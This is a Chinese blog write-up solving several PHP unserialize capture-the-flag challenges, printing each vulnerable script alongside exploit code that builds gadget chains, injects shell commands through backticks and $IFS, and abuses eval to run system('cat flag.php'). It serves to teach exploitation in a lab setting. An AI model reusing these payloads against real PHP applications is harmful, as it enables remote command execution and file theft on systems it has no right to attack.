@shaobaobaoer
2020-12-09T06:39:55.000000Z
字数 6079
阅读 402
未分类
在此输入正文> 发现了一个站 http://106.14.114.127/ 准备做做里面的题目
<?php
@error_reporting(1);
include 'flag.php';
class baby
{
protected $skyobj;
public $aaa;
public $bbb;
function __construct()
{
$this->skyobj = new sec;
}
function __toString()
{
if (isset($this->skyobj))
return $this->skyobj->read();
}
}
class cool
{
public $filename;
public $nice;
public $amzing;
function read()
{
$this->nice = unserialize($this->amzing);
$this->nice->aaa = $sth;
if($this->nice->aaa === $this->nice->bbb)
{
$file = "./{$this->filename}";
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "you must be joking!";
}
}
}
}
class sec
{
function read()
{
return "it's so sec~~";
}
}
if (isset($_GET['data']))
{
$Input_data = unserialize($_GET['data']);
echo $Input_data;
}
else
{
highlight_file("./index.php");
}
?>
思路写在EXP里了。
class cool
{
public $filename;
public $nice;
public $amzing;
function __construct()
{
$this->filename = "flag.php";
}
}
class baby
{
protected $skyobj;
public $aaa;
public $bbb;
function set_skyobj($obj)
{
$this->skyobj = $obj;
}
}
# 构造amazing
$am = new baby();
//$am->aaa = "123";
$am->bbb = &$am->aaa;
$am_str = serialize($am);
# 构造 baby
$ba = new baby();
$_c = new cool();
$_c->amzing = $am_str;
$ba->set_skyobj($_c);
# 打印baby
var_dump($ba);
echo serialize($ba).PHP_EOL;
echo urlencode(serialize($ba));
<?php
error_reporting(0);
class come{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf(trim($v));
}
}
function waf($str){
$str=preg_replace("/[<>*;|?\n ]/","",$str);
$str=str_replace('flag','',$str);
return $str;
}
function echo($host){
system("echo $host");
}
function __destruct(){
if (in_array($this->method, array("echo"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
}
$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
if($i===1)
{
$i++;
$$key = $value;
}
else{break;}
}
if($first==="doller")
{
@parse_str($_GET['a']);
if($var==="give")
{
if($bbb==="me")
{
if($ccc==="flag")
{
echo "<br>welcome!<br>";
$come=@$_POST['come'];
unserialize($come);
}
}
else
{echo "<br>think about it<br>";}
}
else
{
echo "NO";
}
}
else
{
echo "Can you hack me?<br>";
highlight_file(__FILE__);
}
?>
exp
<?php
class come
{
private $method;
private $args;
function __construct($method, $args)
{
$this->method = $method;
$this->args = $args;
}
}
$a = new come("echo", array("`ls\$IFS/`"));
echo urlencode(serialize($a)).PHP_EOL;
echo urlencode("var=give&bbb=me&ccc=flag");
之后改为
$a = new come("echo", array("`cat\$IFS/flaflagg`"));
即可获得
<?php
include 'flag.php';
error_reporting(0);
highlight_file(__FILE__);
class P {
private $var;
function __invoke(){
eval(
'global '.$this -> var.';'.
'$ret = '.$this -> var.';'
);
return $ret;
}
}
class K {
protected $fn;
public $name;
function __toString(){
$fn = $this -> fn;
return $fn();
}
}
class U {
public $obj;
function __wakeup(){
if (!isset($this->obj->name) || $this->obj->name != "iv4n") {
$this -> obj -> fn = function(){};
}
}
}
echo unserialize($_POST['obj'])->obj;
class K
K
中的 $name
使其等于 iv4n
即可绕过 __wakeup()
条件__toString
,可见fn
应该是class P
从而它可以调用__invoke
方法eval('global ' . $var . ';' . '$ret = ' . $var . ';');
写的很trick,利用这样的payload可以绕过global的检查==> $var = "\$GLOBALS;\$ret=system('dir')";
EXP如下
<?php
//include 'flag.php';
//error_reporting(0);
//highlight_file(__FILE__);
class P
{
private $var;
function __set($property_name, $value)
{
$this->$property_name = $value;
}
}
class K
{
protected $fn; # $fn = new P()
public $name;
function __construct($name)
{
$this->name = $name;
}
function __set($property_name, $value)
{
$this->$property_name = $value;
}
}
class U
{
public $obj;
}
$obj = new K("iv4n");
$obj_p = new P();
//$obj_p->var = "\$GLOBALS;\$ret=system('ls')";
// Dockerfile flag.php index.php run.sh run.sh
$obj_p->var = "\$GLOBALS;\$ret=system('cat flag.php')";
$obj->fn = $obj_p;
$obj_u = new U();
$obj_u->obj = $obj;
var_dump(
$obj_u
);
echo urlencode(serialize($obj_u));
# <?php
//$flag = "flag{0k_y0u_4lr3ady_kn0w_uns3ria1ize}";
<?php
require_once "flag.php";
class TOPA{
public $token;
public $ticket;
public $username;
public $password;
function login(){
if($this->username =='aaaaaaaaaaaaaaaaa' && $this->password == 'bbbbbbbbbbbbbbbbbb'){
return 'key is:{'.$this->token.'}';
}
}
}
class TOPB{
public $obj;
public $attr;
function __construct(){
$this->attr = null;
$this->obj = null;
}
function __toString(){
$this->obj = unserialize($this->attr);
$this->obj->token = $GLOBALS["flag"];
if($this->obj->token === $this->obj->ticket){
var_dump($this->obj);
return 'you get flag!';
}
}
}
class TOPC{
public $obj;
public $attr;
function __destruct(){
echo $this->attr;
}
}
if(isset($_GET['a'])) unserialize($_GET['a']);
else highlight_file(__FILE__);
套路和之前一样
<?php
class TOPA
{
public $token;
public $ticket;
public $username;
public $password;
function __construct()
{
$this->token = 123;
$this->ticket = &$this->token;
$this->username = 'aaaaaaaaaaaaaaaaa';
$this->password = 'bbbbbbbbbbbbbbbbbb';
}
}
class TOPB
{
public $obj;
public $attr;
function __construct()
{
$this->attr = null;
$this->obj = null;
}
function __toString()
{
$this->obj = unserialize($this->attr); # this->obj = new TOPA()
$this->obj->token = $GLOBALS["flag"];
if ($this->obj->token === $this->obj->ticket) {
var_dump($this->obj);
return 'you get flag!';
}
}
}
class TOPC
{
public $obj;
public $attr;
function __destruct()
{
echo $this->attr; # this->attr = new TOPB()
}
}
//unserialize($_GET['a']);
$C = new TOPC();
$B = new TOPB();
$A = new TOPA();
$B->attr = $A;
$C->attr = $B;
//var_dump($C);
//echo serialize($C).PHP_EOL;
echo urlencode(serialize($C));
index.php解析开始
<?php
error_reporting(1);
class Read {
private $var;
public function file_get($value)
{
$text = base64_encode(file_get_contents($value));
return $text;
}
public function __invoke(){
$content = $this->file_get($this->var);
echo $content;
}
}
class Show
{
public $source;
public $str;
public function __construct($file='index.php')
{
$this->source = $file;
echo $this->source.'解析开始'."<br>";
}
public function __toString()
{
$this->str['str']->source;
}
public function __set($key,$value)
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|fllllllaaaaaag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}
}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class Test
{
public $params;
public function __construct()
{
$this->params = array();
}
public function __get($key)
{
$func = $this->params;
return $func();
}
}
if(isset($_GET['chal']))
{
$chal = unserialize($_GET['chal']);
}
else
{
$show = new Show('index.php');
$show->_show();
}
?>